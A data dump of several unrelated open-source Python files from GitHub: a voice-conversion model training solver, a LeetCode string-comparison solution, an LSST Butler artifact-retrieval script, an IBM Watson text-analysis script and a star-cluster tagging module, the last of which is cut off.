torch.optim.Adam(self.rp_mi_net.parameters(), lr=3e-4)\n\n # self.cpc = CPCLoss_sameSeq(n_speakers_per_batch=256, n_utterances_per_speaker=8, n_prediction_steps=6,\n # n_negatives=10, z_dim=512+256, c_dim=256)\n #\n # self.cpc_2 = CPCLoss_sameSeq(n_speakers_per_batch=256, n_utterances_per_speaker=8, n_prediction_steps=6,\n # n_negatives=10, z_dim=2, c_dim=256)\n #\n # self.optimizer_cpc = torch.optim.Adam(self.cpc.parameters(), self.g_lr, [self.beta1, self.beta2])\n # self.optimizer_cpc_2 = torch.optim.Adam(self.cpc_2.parameters(), self.g_lr, [self.beta1, self.beta2])\n\n\n if self.use_tensorboard:\n self.build_tensorboard()\n\n def build_model(self):\n # self.G = Generator(self.hparams)\n\n self.G1 = Generator_MI(self.hparams, self.use_VQCPC, self.use_VQCPC_2)\n\n self.Interp = InterpLnr(self.hparams)\n\n self.g_optimizer = torch.optim.Adam(self.G1.parameters(), self.g_lr, [self.beta1, self.beta2])\n self.print_network(self.G1, 'G')\n\n self.G1.to(self.device)\n self.G1 = torch.nn.DataParallel(self.G1, device_ids=self.device_ids, output_device=self.device_ids[0]) # 主要就是这句\n self.Interp.to(self.device)\n\n def build_model2(self):\n self.G2 = Generator_Decoder(self.hparams, self.use_pitch)\n self.g2_optimizer = torch.optim.Adam(self.G2.parameters(), self.g_lr, [self.beta1, self.beta2])\n self.G2.to(self.device)\n self.G2 = torch.nn.DataParallel(self.G2, device_ids=self.device_ids, output_device=self.device_ids[0]) # 主要就是这句\n\n def print_network(self, model, name):\n \"\"\"Print out the network information.\"\"\"\n num_params = 0\n for p in model.parameters():\n num_params += p.numel()\n # print(model)\n # print(name)\n # print(\"The number of parameters: {}\".format(num_params))\n\n def print_optimizer(self, opt, name):\n print(opt)\n print(name)\n\n def restore_model(self, resume_iters):\n print('Loading the trained models from step {}...'.format(resume_iters))\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(resume_iters))\n g_checkpoint = torch.load(G_path, map_location=lambda storage, loc: storage)\n self.G1.load_state_dict(g_checkpoint['model'])\n self.g_optimizer.load_state_dict(g_checkpoint['optimizer'])\n self.g_lr = self.g_optimizer.param_groups[0]['lr']\n\n def build_tensorboard(self):\n \"\"\"Build a tensorboard logger.\"\"\"\n from torch.utils.tensorboard import SummaryWriter\n self.writer = SummaryWriter(self.log_dir)\n\n def reset_grad(self):\n \"\"\"Reset the gradient buffers.\"\"\"\n self.g_optimizer.zero_grad()\n self.g2_optimizer.zero_grad()\n # self.optimizer_cpc.zero_grad()\n # self.optimizer_cpc_2.zero_grad()\n\n def mi_first_forward(self, content, pitch, rhythm, optimizer_cp_mi_net, optimizer_rc_mi_net, optimizer_rp_mi_net):\n optimizer_cp_mi_net.zero_grad()\n optimizer_rc_mi_net.zero_grad()\n optimizer_rp_mi_net.zero_grad()\n content = content.detach()\n pitch = pitch.detach()\n rhythm = rhythm.detach()\n lld_cp_loss = -self.cp_mi_net.loglikeli(content, pitch)\n lld_rc_loss = -self.rc_mi_net.loglikeli(rhythm, content)\n lld_rp_loss = -self.rp_mi_net.loglikeli(rhythm, pitch)\n lld_cp_loss.backward()\n lld_rc_loss.backward()\n lld_rp_loss.backward()\n optimizer_cp_mi_net.step()\n optimizer_rc_mi_net.step()\n optimizer_rp_mi_net.step()\n return optimizer_cp_mi_net, optimizer_rc_mi_net, optimizer_rp_mi_net, lld_cp_loss, lld_rc_loss, lld_rp_loss\n\n def mi_second_forward(self, content, pitch, rhythm, x_real_org):\n if self.use_pitch:\n x_identic, mel_outputs_postnet, spk_pred, content_pred, pitch_predict = self.G2(content, pitch, rhythm, x_real_org)\n return x_identic, mel_outputs_postnet, spk_pred, content_pred, pitch_predict\n else:\n x_identic, mel_outputs_postnet, spk_pred, content_pred = self.G2(content, pitch, rhythm, x_real_org)\n return x_identic, mel_outputs_postnet, spk_pred, content_pred\n\n # =====================================================================================================================\n\n def train(self):\n # Set data loader.\n data_loader = self.vcc_loader\n\n # Fetch fixed inputs for debugging.\n data_iter = iter(data_loader)\n\n self.cp_mi_net.to(self.device)\n self.rc_mi_net.to(self.device)\n self.rp_mi_net.to(self.device)\n\n optimizer_cp_mi_net = self.optimizer_cp_mi_net\n optimizer_rc_mi_net = self.optimizer_rc_mi_net\n optimizer_rp_mi_net = self.optimizer_rp_mi_net\n\n # if self.use_VQCPC:\n # self.cpc.to(self.device)\n # elif self.use_VQCPC_2:\n # self.cpc_2.to(self.device)\n\n\n # Start training from scratch or resume training.\n start_iters = 0\n if self.resume_iters:\n print('Resuming ...')\n start_iters = self.resume_iters\n self.num_iters += self.resume_iters\n self.restore_model(self.resume_iters)\n self.print_optimizer(self.g_optimizer, 'G_optimizer')\n\n # Learning rate cache for decaying.\n g_lr = self.g_lr\n print('Current learning rates, g_lr: {}.'.format(g_lr))\n\n # Print logs in specified order\n\n keys = ['G/loss_id', 'G/loss_id_psnt', 'spk_loss', 'content_adv_loss', 'mi_cp_loss', 'mi_rc_loss',\n 'mi_rp_loss', 'lld_cp_loss', 'lld_rc_loss', 'lld_rp_loss']\n\n if self.use_VQCPC or self.use_VQCPC_2:\n keys.append('vq_loss')\n keys.append('cpc_loss')\n\n if self.use_pitch:\n keys.append('pitch_loss')\n\n # Start training.\n print('Start training...')\n start_time = time.time()\n for i in range(start_iters, self.num_iters):\n\n # =================================================================================== #\n # 1. Preprocess input data #\n # =================================================================================== #\n\n # Fetch real images and labels.\n try:\n x_real_org, emb_org, f0_org, len_org = next(data_iter)\n except:\n data_iter = iter(data_loader)\n x_real_org, emb_org, f0_org, len_org = next(data_iter)\n\n x_real_org = x_real_org.to(self.device)\n emb_org = emb_org.to(self.device)\n len_org = len_org.to(self.device)\n f0_org = f0_org.to(self.device)\n\n # =================================================================================== #\n # 2. Train the generator #\n # =================================================================================== #\n\n self.G1 = self.G1.train()\n self.G2 = self.G2.train()\n\n '''\n input: \n x_real_org: (batch, max_len_pad, mel_dim(80))\n f0_org.shape: (batch, max_len_pad, 1)\n '''\n\n # Identity mapping loss\n x_f0 = torch.cat((x_real_org, f0_org), dim=-1) # to (batch, max_len_pad, mel_dim + f0_dim(81))\n x_f0_intrp = self.Interp(x_f0,\n len_org) # len_org: min_len_seq ~ max_len_seq 之间的随机数, (batch) to (batch, max_len_pad, 81)\n f0_org_intrp = quantize_f0_torch(x_f0_intrp[:, :, -1])[0] # to (batch, max_len_pad, 257)\n x_f0_intrp_org = torch.cat((x_f0_intrp[:, :, :-1], f0_org_intrp), dim=-1) # to (batch, max_len_pad, 257+80)\n\n '''\n x_f0_intrp_org: (batch, max_len_pad, 337)\n x_real_org: (batch, max_len_pad, 80)\n emb_org: (batch, 100)\n '''\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, quantized_, x_f0_beforeVQ, c, x_f0_VQ = self.G1(x_f0_intrp_org, x_real_org)\n else:\n content, pitch, rhythm = self.G1(x_f0_intrp_org, x_real_org)\n\n if self.use_mi:\n for j in range(5): # mi_iters\n optimizer_cp_mi_net, optimizer_rc_mi_net, optimizer_rp_mi_net, lld_cp_loss, lld_rc_loss, lld_rp_loss = \\\n self.mi_first_forward(content, pitch, rhythm, optimizer_cp_mi_net, optimizer_rc_mi_net,\n optimizer_rp_mi_net)\n else:\n lld_cp_loss = torch.tensor(0.).to(self.device)\n lld_rc_loss = torch.tensor(0.).to(self.device)\n lld_rp_loss = torch.tensor(0.).to(self.device)\n\n if self.use_pitch:\n x_identic, mel_outputs_postnet, spk_pred, content_pred, pitch_predict = self.mi_second_forward(content, pitch, rhythm,\n x_real_org)\n else:\n x_identic, mel_outputs_postnet, spk_pred, content_pred = self.mi_second_forward(content, pitch, rhythm,\n x_real_org)\n\n # x_identic, mel_outputs_postnet, spk_pred, content_pred = self.G(x_f0_intrp_org, x_real_org, emb_org) # to (batch, max_len_pad, 80)\n g_loss_id = F.mse_loss(x_real_org.to(self.device), x_identic.to(self.device), reduction='mean')\n g_loss_id_psnt = F.mse_loss(x_real_org.to(self.device), mel_outputs_postnet.to(self.device))\n\n # Backward and optimize.\n if self.use_l1_loss:\n g_loss = g_loss_id + g_loss_id_psnt + \\\n F.l1_loss(x_real_org.to(self.device), x_identic.to(self.device)) + \\\n F.l1_loss(x_real_org.to(self.device), mel_outputs_postnet.to(self.device))\n\n else:\n g_loss = g_loss_id + g_loss_id_psnt\n\n x_real_org.requirre_grad = False\n emb_org.requirre_grad = False\n\n if self.use_adv:\n spk_loss = self.advloss(spk_pred.to(self.device), emb_org)\n content_adv_loss = self.advloss(content_pred, emb_org)\n g_loss += self.lambda_cd * spk_loss + self.lambda_cd * content_adv_loss\n else:\n content_adv_loss = torch.tensor(0.).to(self.device)\n spk_loss = torch.tensor(0.).to(self.device)\n\n if self.use_mi:\n mi_cp_loss = 0.01 * self.cp_mi_net.mi_est(content, pitch) # mi_weight\n mi_rc_loss = 0.01 * self.rc_mi_net.mi_est(rhythm, content) # mi_weight\n mi_rp_loss = 0.01 * self.rp_mi_net.mi_est(rhythm, pitch) # mi_weight\n g_loss += mi_cp_loss + mi_rc_loss + mi_rp_loss\n else:\n mi_cp_loss = torch.tensor(0.).to(self.device)\n mi_rc_loss = torch.tensor(0.).to(self.device)\n mi_rp_loss = torch.tensor(0.).to(self.device)\n\n # if self.use_VQCPC:\n # e_latent_loss = F.mse_loss(x_f0_beforeVQ, quantized_.detach())\n # vq_loss = 0.25 * e_latent_loss\n #\n # cpc_loss, accuracy = self.cpc(x_f0_VQ, c)\n #\n # g_loss += vq_loss + cpc_loss\n #\n # elif self.use_VQCPC_2:\n # e_latent_loss = F.mse_loss(x_f0_beforeVQ, quantized_.detach())\n # vq_loss = 0.25 * e_latent_loss\n #\n # cpc_loss, accuracy = self.cpc_2(x_f0_VQ, c)\n #\n # g_loss += vq_loss + cpc_loss\n\n if self.use_pitch:\n zeros = torch.zeros_like(f0_org)\n f0_zero = torch.where(f0_org == -1e10, zeros, f0_org)\n pitch_loss = F.mse_loss(f0_zero.to(self.device), pitch_predict.to(self.device), reduction='mean')\n g_loss += 0.1 * pitch_loss\n\n self.reset_grad()\n g_loss.backward()\n self.g_optimizer.step()\n self.g2_optimizer.step()\n # if self.use_VQCPC:\n # self.optimizer_cpc.step()\n #\n # elif self.use_VQCPC_2:\n # self.optimizer_cpc_2.step()\n\n # Logging.\n loss = {}\n loss['G/loss_id'] = g_loss_id.item()\n loss['G/loss_id_psnt'] = g_loss_id_psnt.item()\n loss['spk_loss'] = spk_loss.item()\n loss['content_adv_loss'] = content_adv_loss.item()\n loss['mi_cp_loss'] = mi_cp_loss.item()\n loss['mi_rc_loss'] = mi_rc_loss.item()\n loss['mi_rp_loss'] = mi_rp_loss.item()\n loss['lld_cp_loss'] = lld_cp_loss.item()\n loss['lld_rc_loss'] = lld_rc_loss.item()\n loss['lld_rp_loss'] = lld_rp_loss.item()\n # if self.use_VQCPC or self.use_VQCPC_2:\n # loss['vq_loss'] = vq_loss.item()\n # loss['cpc_loss'] = cpc_loss.item()\n if self.use_pitch:\n loss['pitch_loss'] = pitch_loss.item()\n\n\n\n # =================================================================================== #\n # 4. Miscellaneous #\n # =================================================================================== #\n\n # Print out training information.\n if (i + 1) % self.log_step == 0:\n et = time.time() - start_time\n et = str(datetime.timedelta(seconds=et))[:-7]\n log = \"Elapsed [{}], Iteration [{}/{}]\".format(et, i + 1, self.num_iters)\n for tag in keys:\n log += \", {}: {:.8f}\".format(tag, loss[tag])\n print(log)\n # if self.use_VQCPC or self.use_VQCPC_2:\n # print(100 * np.array(accuracy))\n\n if self.use_tensorboard:\n for tag, value in loss.items():\n self.writer.add_scalar(tag, value, i + 1)\n\n # Save model checkpoints.\n if (i + 1) >= 150000 and (i + 1) % self.model_save_step == 0:\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(i + 1))\n\n checkpoint_state = {\n 'G1': self.G1.state_dict(),\n 'G2': self.G2.state_dict(),\n 'optimizerG1': self.g_optimizer.state_dict(),\n 'optimizerG2': self.g2_optimizer.state_dict(),\n 'cp_mi_net': self.cp_mi_net.state_dict(),\n 'rc_mi_net': self.rc_mi_net.state_dict(),\n 'rp_mi_net': self.rp_mi_net.state_dict(),\n \"optimizer_cp_mi_net\": optimizer_cp_mi_net.state_dict(),\n \"optimizer_rc_mi_net\": optimizer_rc_mi_net.state_dict(),\n \"optimizer_rp_mi_net\": optimizer_rp_mi_net.state_dict(),\n \"epoch\": i + 1\n }\n\n # if self.use_VQCPC:\n # checkpoint_state[\"cpc\"] = self.cpc.state_dict()\n # checkpoint_state[\"optimizer_cpc\"] = self.optimizer_cpc.state_dict()\n # if self.use_VQCPC_2:\n # checkpoint_state[\"cpc\"] = self.cpc_2.state_dict()\n # checkpoint_state[\"optimizer_cpc\"] = self.optimizer_cpc_2.state_dict()\n\n torch.save(checkpoint_state, G_path)\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\n\n # Validation.\n if (i + 1) % self.sample_step == 0:\n self.G1 = self.G1.eval()\n self.G2 = self.G2.eval()\n with torch.no_grad():\n loss_val = []\n for val_sub in validation_pt:\n # emb_org_val = torch.from_numpy(val_sub[1]).to(self.device)\n for k in range(2, 3):\n x_real_pad, _ = pad_seq_to_2(val_sub[k][0][np.newaxis, :, :], MAX_LEN)\n # len_org = torch.tensor([val_sub[k][2]]).to(self.device)\n f0_org = np.pad(val_sub[k][1], (0, MAX_LEN - val_sub[k][2]), 'constant',\n constant_values=(0, 0))\n f0_quantized = quantize_f0_numpy(f0_org)[0]\n f0_onehot = f0_quantized[np.newaxis, :, :]\n f0_org_val = torch.from_numpy(f0_onehot).to(self.device)\n x_real_pad = torch.from_numpy(x_real_pad).to(self.device)\n x_f0 = torch.cat((x_real_pad, f0_org_val), dim=-1)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_val, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_val, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n # x_identic_val = self.G(x_f0, x_real_pad, emb_org_val)\n g_loss_val = F.mse_loss(x_real_pad, x_identic_val, reduction='sum')\n loss_val.append(g_loss_val.item())\n val_loss = np.mean(loss_val)\n print('Validation loss: {}'.format(val_loss))\n if self.use_tensorboard:\n self.writer.add_scalar('Validation_loss', val_loss, i + 1)\n\n # plot test samples\n if (i + 1) % self.sample_step == 0:\n self.G1 = self.G1.eval()\n self.G2 = self.G2.eval()\n with torch.no_grad():\n for val_sub in validation_pt:\n # emb_org_val = torch.from_numpy(val_sub[1]).to(self.device)\n for k in range(2, 3):\n x_real_pad, _ = pad_seq_to_2(val_sub[k][0][np.newaxis, :, :], MAX_LEN)\n # len_org = torch.tensor([val_sub[k][2]]).to(self.device)\n f0_org = np.pad(val_sub[k][1], (0, MAX_LEN - val_sub[k][2]), 'constant',\n constant_values=(0, 0))\n f0_quantized = quantize_f0_numpy(f0_org)[0]\n f0_onehot = f0_quantized[np.newaxis, :, :]\n f0_org_val = torch.from_numpy(f0_onehot).to(self.device)\n x_real_pad = torch.from_numpy(x_real_pad).to(self.device)\n x_f0 = torch.cat((x_real_pad, f0_org_val), dim=-1)\n x_f0_F = torch.cat((x_real_pad, torch.zeros_like(f0_org_val)), dim=-1)\n x_f0_C = torch.cat((torch.zeros_like(x_real_pad), f0_org_val), dim=-1)\n\n # x_identic_val = self.G(x_f0, x_real_pad, emb_org_val)\n # x_identic_woF = self.G(x_f0_F, x_real_pad, emb_org_val)\n # x_identic_woR = self.G(x_f0, torch.zeros_like(x_real_pad), emb_org_val)\n # x_identic_woC = self.G(x_f0_C, x_real_pad, emb_org_val)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_val, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_val, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0_F, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0_F, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_woF, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_woF, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0, torch.zeros_like(x_real_pad)) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0, torch.zeros_like(x_real_pad)) # emb_trg\n if self.use_pitch:\n _, x_identic_woR, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_woR, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0_C, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0_C, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_woC, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_woC, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n melsp_gd_pad = x_real_pad[0].cpu().numpy().T\n melsp_out = x_identic_val[0].cpu().numpy().T\n melsp_woF = x_identic_woF[0].cpu().numpy().T\n melsp_woR = x_identic_woR[0].cpu().numpy().T\n melsp_woC = x_identic_woC[0].cpu().numpy().T\n\n min_value = np.min(np.hstack([melsp_gd_pad, melsp_out, melsp_woF, melsp_woR, melsp_woC]))\n max_value = np.max(np.hstack([melsp_gd_pad, melsp_out, melsp_woF, melsp_woR, melsp_woC]))\n\n fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(5, 1, sharex=True)\n im1 = ax1.imshow(melsp_gd_pad, aspect='auto', vmin=min_value, vmax=max_value)\n im2 = ax2.imshow(melsp_out, aspect='auto', vmin=min_value, vmax=max_value)\n im3 = ax3.imshow(melsp_woC, aspect='auto', vmin=min_value, vmax=max_value)\n im4 = ax4.imshow(melsp_woR, aspect='auto', vmin=min_value, vmax=max_value)\n im5 = ax5.imshow(melsp_woF, aspect='auto', vmin=min_value, vmax=max_value)\n plt.savefig(f'{self.sample_dir}/{i + 1}_{val_sub[0]}_{k}.png', dpi=150)\n plt.close(fig)\n","repo_name":"YoungSeng/SRD-VC","sub_path":"My_model/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":26091,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"66"} +{"seq_id":"70084946451","text":"#https://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/529/week-2/3291/\n#Given two strings S and T, return if they are equal when both are typed into empty text editors. # means a backspace character.\n\nclass Solution:\n\n def processWord(self, word: str):\n newChars=[]\n for i in range (0,len(word)):\n if word[i]==\"#\":\n if newChars!=[]:\n newChars.pop()\n \n continue\n \n newChars.append(word[i])\n return newChars\n \n \n def backspaceCompare(self, S: str, T: str) -> bool:\n newS=self.processWord(S)\n newT=self.processWord(T) \n \n return newS==newT\n","repo_name":"Iryna-Slynko/Python-Challenges","sub_path":"Backspace-String-Compare.py","file_name":"Backspace-String-Compare.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"874391634","text":"from __future__ import annotations\n\n__all__ = (\"retrieveArtifacts\",)\n\nimport logging\nfrom types import EllipsisType\nfrom typing import TYPE_CHECKING\n\nfrom .._butler import Butler\n\nif TYPE_CHECKING:\n from lsst.resources import ResourcePath\n\nlog = logging.getLogger(__name__)\n\n\ndef retrieveArtifacts(\n repo: str,\n destination: str,\n dataset_type: tuple[str, ...],\n collections: tuple[str, ...],\n where: str,\n find_first: bool,\n transfer: str,\n preserve_path: bool,\n clobber: bool,\n) -> list[ResourcePath]:\n \"\"\"Parameters are those required for querying datasets plus a destination\n URI.\n\n Parameters\n ----------\n repo : `str`\n URI string of the Butler repo to use.\n destination : `str`\n URI string of the directory to write the artifacts.\n dataset_type : `tuple` of `str`\n Dataset type names. An empty tuple implies all dataset types.\n collections : `tuple` of `str`\n Names of collection globs to match. An empty tuple implies all\n collections.\n where : `str`\n Query modification string.\n find_first : `bool`\n Whether only the first match should be used.\n transfer : `str`\n Transfer mode to use when placing artifacts in the destination.\n preserve_path : `bool`\n If `True` the full datastore path will be retained within the\n destination directory, else only the filename will be used.\n clobber : `bool`\n If `True` allow transfers to overwrite files at the destination.\n\n Returns\n -------\n transferred : `list` of `lsst.resources.ResourcePath`\n The destination URIs of every transferred artifact.\n \"\"\"\n query_types = dataset_type or ...\n query_collections: tuple[str, ...] | EllipsisType = collections or ...\n\n butler = Butler.from_config(repo, writeable=False)\n\n # Need to store in list so we can count the number to give some feedback\n # to caller.\n refs = list(\n butler.registry.queryDatasets(\n datasetType=query_types, collections=query_collections, where=where, findFirst=find_first\n )\n )\n\n log.info(\"Number of datasets matching query: %d\", len(refs))\n\n transferred = butler.retrieveArtifacts(\n refs, destination=destination, transfer=transfer, preserve_path=preserve_path, overwrite=clobber\n )\n return transferred\n","repo_name":"lsst/daf_butler","sub_path":"python/lsst/daf/butler/script/retrieveArtifacts.py","file_name":"retrieveArtifacts.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"33044569692","text":"from __future__ import print_function\nimport json\nimport pandas as pd\nimport re\nfrom watson_developer_cloud import NaturalLanguageUnderstandingV1\nfrom watson_developer_cloud.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions\n\n#Instantiate NLU Object with your Credentials\nservice = NaturalLanguageUnderstandingV1(\n version='2018-03-16',\n #url is optional, and defaults to the URL below. Use the correct URL for your region.\n url='https://gateway.watsonplatform.net/natural-language-understanding/api',\n #change here to your apikey\n iam_apikey='apikey')\n\n#read data\ndf = pd.read_csv(\"ads.csv\")\n\n#remove none value from text data\ndf = df[df[\"Ad_Text \"] != 'none']\n\n#make a test copy\ntest_data = df.head(50).copy()\n\n\nfor index, ad_text in df['Ad_Text '].iteritems():\n print(index)\n response = service.analyze(\n text=ad_text,\n features=Features(entities=EntitiesOptions(),\n keywords=KeywordsOptions()),\n language='en'\n ).get_result()\n # text_characters\n text_characters = re.sub('[\"''{},:]', '', json.dumps(response['usage']['text_characters']))\n df.at[index, \"text_characters\"] = int(text_characters)\n #some text are too small to have 2 keywords and 3 entities, so using aviod error here\n try:\n # keyword\n keyword_1 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][0][\"text\"]))\n relevance_1 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][0][\"relevance\"]))\n keyword_1 = keyword_1.replace(\"'\", \" \").replace(\"'\", \" \").replace(\"'\", \"\")\n test_data.at[index, str(keyword_1)] = float(relevance_1)\n keyword_2 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][1][\"text\"]))\n relevance_2 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][1][\"relevance\"]))\n keyword_2 = keyword_2.replace(\"'\", \" \").replace(\"'\", \" \").replace(\"'\", \"\")\n #save keyword and score to dataframe\n test_data.at[index, str(keyword_2)] = float(relevance_2)\n # entities\n entity_1 = re.sub('[\"{},:]', '', json.dumps(response['entities'][0][\"type\"]))\n entity_relevance_1 = re.sub('[\"{},:]', '', json.dumps(response['entities'][0][\"relevance\"]))\n entity_2 = re.sub('[\"{},:]', '', json.dumps(response['entities'][1][\"type\"]))\n entity_relevance_2 = re.sub('[\"{},:]', '', json.dumps(response['entities'][1][\"relevance\"]))\n entity_3 = re.sub('[\"{},:]', '', json.dumps(response['entities'][2][\"type\"]))\n entity_relevance_3 = re.sub('[\"{},:]', '', json.dumps(response['entities'][2][\"relevance\"]))\n #save entity and score to dataframe\n test_data.at[index, str(entity_1)] = float(entity_relevance_1)\n test_data.at[index, str(entity_2)] = float(entity_relevance_2)\n test_data.at[index, str(entity_3)] = float(entity_relevance_3)\n except IndexError or ValueError:\n continue\n\n\ntest_data.to_csv('IBM_test_data.csv')\n","repo_name":"luna0212/F2018APRD6342DigitalAdvertising","sub_path":"IBM_natural_language_understanding_v1.py","file_name":"IBM_natural_language_understanding_v1.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39652422813","text":"import os\nimport h5py\nimport numpy as np\nfrom galpy.util import multi as ml\nfrom astropy.io import fits\nfrom sklearn.metrics import homogeneity_score\nfrom tagspace import tagdir\nfrom tagspace.data import gettimestr\nfrom tagspace.wrappers.genfns import normalgeneration\nfrom tagspace.data.spectra import spectra\nfrom tagspace.clusters import external_validation\nfrom tagspace.clusters.makeclusters import makeclusters\n\nclass tag(makeclusters):\n\t\"\"\"\n\tUsing existing data, find clusters using a user-specified cluster finding algorithm\n\tstructured after the template of scikit-learn (e.g. a class with a fit_predict \n\tfunction)\n\n\t\"\"\"\n\tdef __init__(self,genfn=normalgeneration,instances=1,readdata=False,\n\t\t\t\t filename=None,numcluster=20,numelem=10,maxcores=1,\n\t\t\t\t elems=np.array([6,7,8,11,12,13,14,16,19,20]),\n\t\t\t\t **kwargs):\n\t\t\"\"\"\n\t\tCreate or read cluster data.\n\n\t\tgenfn:\t\tFunction used to find cluster center abundances \n\t\t\t\t\t(defaults to choosing from a normal distribution)\n\t\tinstances:\tThe number of clusters to create with the same \n\t\t\t\t\tparameters (defaults to one)\n\t\treaddata:\tBoolean that looks for existing data if set True \n\t\t\t\t\t(redundant with filename******)\n\t\tfilename:\tIf readdata, read cluster center information from this \n\t\t\t\t\tpath. Unless the path starts are root '/' or home '~', \n\t\t\t\t\tassumes data lives in the TAGSPACE_DATA environment \n\t\t\t\t\tvariable\n\t\tnumcluster:\tnumber of clusters to generate (defaults to 20)\n\t\tmaxcores:\tMaxmimum number of cores to use for parallel processes\n\t\telems:\t\tList or array of atomic numbers or symbols for elements\n\t\t\t\t\tto be generated (defaults to: carbon, nitrogen, oxygen,\n\t\t\t\t\tsodum, magnesium, aluminum, silicon, sulfur, potassium,\n\t\t\t\t\tand calcium)\n\t\t**kwargs:\tPassed to genfn\n\n\t\tReturns None\n\t\t\"\"\"\n\t\tsuper(tag,self).__init__(self,genfn=normalgeneration,instances=instances,readdata=readdata,\n\t\t\t\t \t\t\t \t filename=filename,numcluster=numcluster,numelem=numelem,maxcores=maxcores,\n\t\t\t\t \t\t\t \t elems=elems,**kwargs)\n\t\treturn None\n\n\tdef cluster_wrapper(self,i):\n\t\t\"\"\"\n\t\tWrapper to find clusters in parallel.\n\n\t\ti:\t\tIndex to the cluster created instance to use.\n\t\t\"\"\"\n\t\tnumstars = self.clusterdata[i].shape[0]\n\t\tnumproperties = self.clusterdata[i].shape[1]\n\t\trepeatpreds = np.zeros((numstars*self.repeats))\n\t\tstartrack = 0\n\t\tfor r in range(self.repeats):\n\t\t\tpredict = self.clusterfn(**self.kwargs).fit_predict(self.clusterdata[i])\n\t\t\trepeatpreds[startrack:startrack+numstars] = predict\n\t\t\tstartrack+=numstars\n\t\tself.instance['labels_pred_{0}'.format(self.timestamps[i])] = repeatpreds\n\t\tpreds = self.instance['labels_pred_{0}'.format(self.timestamps[i])]\n\t\tpreds.attrs['data'] = self.datapath[i]\n\t\tgetwrapperattrs(preds,self.clusterfn,kwargdict=kwargs)\n\t\treturn repeatpreds\n\n\tdef cluster(self,datapath,clusterfn,repeats=1,**kwargs):\n\t\t\"\"\"\n\t\tIdentify clusters in data file\n\n\t\tdatapath:\t\tPath to cluster data in hdf5 path\n\t\tclusterfn:\t\tFunction used to identify cluster (in the style of scikit learn)\n\t\trepeats:\t\tNumber of times to apply cluster finding to a given data set.\n\t\t**kwargs:\t\tPass to clusterfn\n\n\t\tReturns None\n\n\t\t\"\"\"\n\t\t# Open relevant datafile\n\t\tself.clsfilename = tagdir+'cluster_find/'+self.clusterfn.__name__+'/clusterfinding.hdf5'\n\t\tself.clsdatafile = h5py.File(self.clsfilename,'w')\n\t\tself.clusterpath = clusterfn.__name__\n\n\t\t# Create group if it doesn't already exist\n\t\tif self.clusterpath not in self.datafile:\n\t\t\tself.instance = self.datafile.create_group(self.clusterpath)\n\t\telif self.clusterpath in self.datafile:\n\t\t\tself.instance = self.datafile[self.clusterpath]\n\n\t\t# Find cluster data\n\t\tself.datapath = datapath\n\t\tself.syndatafile = h5py.File(self.synfilename,'w')\n\t\tself.clusterdata = self.syndatafile[datapath][:]\n\t\tself.clusterfn = clusterfn\n\t\tself.repeats = repeats\n\t\tself.kwargs = kwargs\n\t\tself.labels_pred = np.array(ml.parallel_map(self.cluster_wrapper,\n\t\t\t\t\t\t\t\t\t\t\t\t\trange(self.instances),\n\t\t\t\t\t\t\t\t\t\t \t\t\tnumcores=self.maxcores))\n\t\tself.datafile.close()\n\t\treturn None\n\n\tdef extval(self,metric=homogeneity_score):\n\t\tself.extscores = np.zeros((self.instances,self.repeats,self.labels_true.shape[1])) \n\t\tfor i in range(self.instances):\n\t\t\tfor r in range(self.repeats):\n\t\t\t\tself.extscores[i][r] = external_validation(self.labels_true[i],self.labels_pred[i][r],metric=metric)\n\t\treturn None\n\n\tdef intval():\n\t\treturn None\n\n\tdef violinstats():\n\t\treturn 